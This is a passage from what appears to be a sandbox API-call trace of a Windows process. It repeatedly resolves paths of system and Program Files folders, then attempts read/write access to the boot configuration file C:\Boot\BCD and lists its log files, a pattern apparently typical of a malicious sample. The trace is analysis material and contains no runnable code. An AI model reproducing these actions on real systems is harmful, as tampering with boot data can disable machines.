lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.217] CloseHandle (hObject=0x114) returned 1 [0129.217] GetFileType (hFile=0xa4) returned 0x1 [0129.217] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Windows Portable Devices") returned 0x2d [0129.217] CloseHandle (hObject=0xa4) returned 1 [0129.218] GetFileType (hFile=0x114) returned 0x1 [0129.218] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.218] CloseHandle (hObject=0x114) returned 1 [0129.218] GetFileType (hFile=0xa4) returned 0x1 [0129.218] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer") returned 0x2f [0129.219] CloseHandle (hObject=0xa4) returned 1 [0129.219] GetFileType (hFile=0x114) returned 0x1 [0129.219] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.219] CloseHandle (hObject=0x114) returned 1 [0129.219] GetFileType (hFile=0xa4) returned 0x1 [0129.219] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Microsoft Office") returned 0x25 [0129.220] CloseHandle (hObject=0xa4) returned 1 [0129.220] GetFileType (hFile=0x114) returned 0x1 [0129.220] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.220] CloseHandle (hObject=0x114) returned 1 [0129.220] GetFileType (hFile=0xa4) returned 0x1 [0129.220] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\MSBuild") returned 0x1c [0129.221] CloseHandle (hObject=0xa4) returned 1 [0129.221] GetFileType (hFile=0x114) returned 0x1 [0129.221] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.221] CloseHandle (hObject=0x114) returned 1 [0129.222] GetFileType (hFile=0xa4) returned 0x1 [0129.222] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Windows Photo Viewer") returned 0x29 [0129.222] CloseHandle (hObject=0xa4) returned 1 [0129.222] GetFileType (hFile=0x114) returned 0x1 [0129.222] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.222] CloseHandle (hObject=0x114) returned 1 [0129.223] GetFileType (hFile=0xa4) returned 0x1 [0129.223] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Windows Journal") returned 0x24 [0129.223] CloseHandle (hObject=0xa4) returned 1 [0129.223] GetFileType (hFile=0x114) returned 0x1 [0129.223] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.224] CloseHandle (hObject=0x114) returned 1 [0129.224] GetFileType (hFile=0xa4) returned 0x1 [0129.224] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Windows Defender") returned 0x25 [0129.224] CloseHandle (hObject=0xa4) returned 1 [0129.224] GetFileType (hFile=0x114) returned 0x1 [0129.224] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.225] CloseHandle (hObject=0x114) returned 1 [0129.225] GetFileType (hFile=0xa4) returned 0x1 [0129.225] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\DVD Maker") returned 0x1e [0129.225] CloseHandle (hObject=0xa4) returned 1 [0129.225] GetFileType (hFile=0x114) returned 0x1 [0129.225] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.226] CloseHandle (hObject=0x114) returned 1 [0129.226] GetFileType (hFile=0xa4) returned 0x1 [0129.226] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Uninstall Information") returned 0x30 [0129.226] CloseHandle (hObject=0xa4) returned 1 [0129.226] GetFileType (hFile=0x114) returned 0x1 [0129.226] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.227] CloseHandle (hObject=0x114) returned 1 [0129.227] GetFileType (hFile=0xa4) returned 0x1 [0129.227] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Windows Photo Viewer") returned 0x29 [0129.227] CloseHandle (hObject=0xa4) returned 1 [0129.227] GetFileType (hFile=0x114) returned 0x1 [0129.227] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.228] CloseHandle (hObject=0x114) returned 1 [0129.228] GetFileType (hFile=0xa4) returned 0x1 [0129.228] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Windows Defender") returned 0x2b [0129.228] CloseHandle (hObject=0xa4) returned 1 [0129.228] GetFileType (hFile=0x114) returned 0x1 [0129.228] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.229] CloseHandle (hObject=0x114) returned 1 [0129.229] GetFileType (hFile=0xa4) returned 0x1 [0129.229] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Microsoft Office") returned 0x2b [0129.229] CloseHandle (hObject=0xa4) returned 1 [0129.229] GetFileType (hFile=0x114) returned 0x1 [0129.229] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.230] CloseHandle (hObject=0x114) returned 1 [0129.230] GetFileType (hFile=0xa4) returned 0x1 [0129.230] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Google") returned 0x21 [0129.230] CloseHandle (hObject=0xa4) returned 1 [0129.230] GetFileType (hFile=0x114) returned 0x1 [0129.230] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.231] CloseHandle (hObject=0x114) returned 1 [0129.231] GetFileType (hFile=0xa4) returned 0x1 [0129.231] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services") returned 0x36 [0129.231] CloseHandle (hObject=0xa4) returned 1 [0129.232] GetFileType (hFile=0x114) returned 0x1 [0129.232] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.232] CloseHandle (hObject=0x114) returned 1 [0129.232] GetFileType (hFile=0xa4) returned 0x1 [0129.232] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Google") returned 0x21 [0129.233] CloseHandle (hObject=0xa4) returned 1 [0129.233] GetFileType (hFile=0x114) returned 0x1 [0129.233] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.234] CloseHandle (hObject=0x114) returned 1 [0129.234] GetFileType (hFile=0xa4) returned 0x1 [0129.234] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer") returned 0x2f [0129.234] CloseHandle (hObject=0xa4) returned 1 [0129.235] GetFileType (hFile=0x114) returned 0x1 [0129.235] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.235] CloseHandle (hObject=0x114) returned 1 [0129.235] GetFileType (hFile=0xa4) returned 0x1 [0129.235] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Microsoft Analysis Services") returned 0x30 [0129.236] CloseHandle (hObject=0xa4) returned 1 [0129.236] GetFileType (hFile=0x114) returned 0x1 [0129.236] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.236] CloseHandle (hObject=0x114) returned 1 [0129.236] GetFileType (hFile=0xa4) returned 0x1 [0129.236] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Windows NT") returned 0x1f [0129.237] CloseHandle (hObject=0xa4) returned 1 [0129.237] GetFileType (hFile=0x114) returned 0x1 [0129.237] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.237] CloseHandle (hObject=0x114) returned 1 [0129.237] GetFileType (hFile=0xa4) returned 0x1 [0129.237] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\MSBuild") returned 0x1c [0129.238] CloseHandle (hObject=0xa4) returned 1 [0129.238] GetFileType (hFile=0x114) returned 0x1 [0129.238] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.238] CloseHandle (hObject=0x114) returned 1 [0129.238] GetFileType (hFile=0xa4) returned 0x1 [0129.238] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer") returned 0x2f [0129.239] CloseHandle (hObject=0xa4) returned 1 [0129.239] GetFileType (hFile=0x114) returned 0x1 [0129.239] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.239] CloseHandle (hObject=0x114) returned 1 [0129.239] GetFileType (hFile=0xa4) returned 0x1 [0129.239] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service") returned 0x36 [0129.240] CloseHandle (hObject=0xa4) returned 1 [0129.240] GetFileType (hFile=0x114) returned 0x1 [0129.240] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.241] CloseHandle (hObject=0x114) returned 1 [0129.241] GetFileType (hFile=0xa4) returned 0x1 [0129.241] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services") returned 0x36 [0129.241] CloseHandle (hObject=0xa4) returned 1 [0129.241] GetFileType (hFile=0x114) returned 0x1 [0129.241] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.242] CloseHandle (hObject=0x114) returned 1 [0129.242] GetFileType (hFile=0xa4) returned 0x1 [0129.242] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Windows NT") returned 0x1f [0129.242] CloseHandle (hObject=0xa4) returned 1 [0129.242] GetFileType (hFile=0x114) returned 0x1 [0129.242] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.243] CloseHandle (hObject=0x114) returned 1 [0129.243] GetFileType (hFile=0xa4) returned 0x1 [0129.243] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET") returned 0x28 [0129.243] CloseHandle (hObject=0xa4) returned 1 [0129.243] GetFileType (hFile=0x114) returned 0x1 [0129.243] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.244] CloseHandle (hObject=0x114) returned 1 [0129.244] GetFileType (hFile=0xa4) returned 0x1 [0129.244] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Java") returned 0x1f [0129.244] CloseHandle (hObject=0xa4) returned 1 [0129.244] GetFileType (hFile=0x114) returned 0x1 [0129.244] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.245] CloseHandle (hObject=0x114) returned 1 [0129.245] GetFileType (hFile=0xa4) returned 0x1 [0129.245] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Windows Media Player") returned 0x29 [0129.245] CloseHandle (hObject=0xa4) returned 1 [0129.245] GetFileType (hFile=0x114) returned 0x1 [0129.245] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.246] CloseHandle (hObject=0x114) returned 1 [0129.246] GetFileType (hFile=0xa4) returned 0x1 [0129.246] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Internet Explorer") returned 0x26 [0129.247] CloseHandle (hObject=0xa4) returned 1 [0129.247] GetFileType (hFile=0x114) returned 0x1 [0129.247] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.247] CloseHandle (hObject=0x114) returned 1 [0129.247] GetFileType (hFile=0xa4) returned 0x1 [0129.247] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\MSBuild") returned 0x22 [0129.248] CloseHandle (hObject=0xa4) returned 1 [0129.248] GetFileType (hFile=0x114) returned 0x1 [0129.248] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.248] CloseHandle (hObject=0x114) returned 1 [0129.249] GetFileType (hFile=0xa4) returned 0x1 [0129.249] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Microsoft Office") returned 0x25 [0129.249] CloseHandle (hObject=0xa4) returned 1 [0129.249] GetFileType (hFile=0x114) returned 0x1 [0129.249] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.250] CloseHandle (hObject=0x114) returned 1 [0129.250] GetFileType (hFile=0xa4) returned 0x1 [0129.250] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Windows Photo Viewer") returned 0x29 [0129.250] CloseHandle (hObject=0xa4) returned 1 [0129.250] GetFileType (hFile=0x114) returned 0x1 [0129.250] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.251] CloseHandle (hObject=0x114) returned 1 [0129.251] GetFileType (hFile=0xa4) returned 0x1 [0129.251] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies") returned 0x2f [0129.251] CloseHandle (hObject=0xa4) returned 1 [0129.251] GetFileType (hFile=0x114) returned 0x1 [0129.251] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.252] CloseHandle (hObject=0x114) returned 1 [0129.252] GetFileType (hFile=0xa4) returned 0x1 [0129.252] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Windows Mail") returned 0x27 [0129.252] CloseHandle (hObject=0xa4) returned 1 [0129.252] GetFileType (hFile=0x114) returned 0x1 [0129.252] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.253] CloseHandle (hObject=0x114) returned 1 [0129.253] GetFileType (hFile=0xa4) returned 0x1 [0129.253] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Common Files") returned 0x21 [0129.253] CloseHandle (hObject=0xa4) returned 1 [0129.253] GetFileType (hFile=0x114) returned 0x1 [0129.253] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.254] CloseHandle (hObject=0x114) returned 1 [0129.254] GetFileType (hFile=0xa4) returned 0x1 [0129.254] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Windows Mail") returned 0x21 [0129.255] CloseHandle (hObject=0xa4) returned 1 [0129.255] GetFileType (hFile=0x114) returned 0x1 [0129.255] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.255] CloseHandle (hObject=0x114) returned 1 [0129.256] GetFileType (hFile=0xa4) returned 0x1 [0129.256] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Adobe") returned 0x20 [0129.257] CloseHandle (hObject=0xa4) returned 1 [0129.257] GetFileType (hFile=0x114) returned 0x1 [0129.257] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.258] CloseHandle (hObject=0x114) returned 1 [0129.258] GetFileType (hFile=0xa4) returned 0x1 [0129.258] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Reference Assemblies") returned 0x29 [0129.258] CloseHandle (hObject=0xa4) returned 1 [0129.258] GetFileType (hFile=0x114) returned 0x1 [0129.258] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.259] CloseHandle (hObject=0x114) returned 1 [0129.259] GetFileType (hFile=0xa4) returned 0x1 [0129.259] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Windows Journal") returned 0x24 [0129.260] CloseHandle (hObject=0xa4) returned 1 [0129.260] GetFileType (hFile=0x114) returned 0x1 [0129.260] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.260] CloseHandle (hObject=0x114) returned 1 [0129.260] GetFileType (hFile=0xa4) returned 0x1 [0129.261] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Google") returned 0x21 [0129.261] CloseHandle (hObject=0xa4) returned 1 [0129.262] GetFileType (hFile=0x114) returned 0x1 [0129.262] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.262] CloseHandle (hObject=0x114) returned 1 [0129.262] GetFileType (hFile=0xa4) returned 0x1 [0129.262] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Windows Journal") returned 0x24 [0129.263] CloseHandle (hObject=0xa4) returned 1 [0129.263] GetFileType (hFile=0x114) returned 0x1 [0129.263] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.264] CloseHandle (hObject=0x114) returned 1 [0129.264] GetFileType (hFile=0xa4) returned 0x1 [0129.264] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Windows Portable Devices") returned 0x2d [0129.264] CloseHandle (hObject=0xa4) returned 1 [0129.264] GetFileType (hFile=0x114) returned 0x1 [0129.264] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.265] CloseHandle (hObject=0x114) returned 1 [0129.265] GetFileType (hFile=0xa4) returned 0x1 [0129.265] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Adobe") returned 0x20 [0129.266] CloseHandle (hObject=0xa4) returned 1 [0129.266] GetFileType (hFile=0x114) returned 0x1 [0129.266] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.266] CloseHandle (hObject=0x114) returned 1 [0129.267] GetFileType (hFile=0xa4) returned 0x1 [0129.267] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files\\Windows Defender") returned 0x25 [0129.267] CloseHandle (hObject=0xa4) returned 1 [0129.267] GetFileType (hFile=0x114) returned 0x1 [0129.267] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.268] CloseHandle (hObject=0x114) returned 1 [0129.268] GetFileType (hFile=0xa4) returned 0x1 [0129.268] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar") returned 0x2a [0129.268] CloseHandle (hObject=0xa4) returned 1 [0129.269] GetFileType (hFile=0x114) returned 0x1 [0129.269] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\Fonts\\StaticCache.dat") returned 0x24 [0129.269] CloseHandle (hObject=0x114) returned 1 [0129.269] GetFileType (hFile=0xa4) returned 0x1 [0129.269] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows") returned 0xe [0129.270] CloseHandle (hObject=0xa4) returned 1 [0129.270] GetFileType (hFile=0x114) returned 0x1 [0129.270] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Program Files (x86)\\Adobe") returned 0x20 [0129.271] CloseHandle (hObject=0x114) returned 1 [0129.271] GetFileType (hFile=0xa4) returned 0x1 [0129.273] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\Fonts\\StaticCache.dat") returned 0x24 [0129.274] CloseHandle (hObject=0xa4) returned 1 [0129.312] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.313] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x9098e7a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0129.313] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD.LOG1", 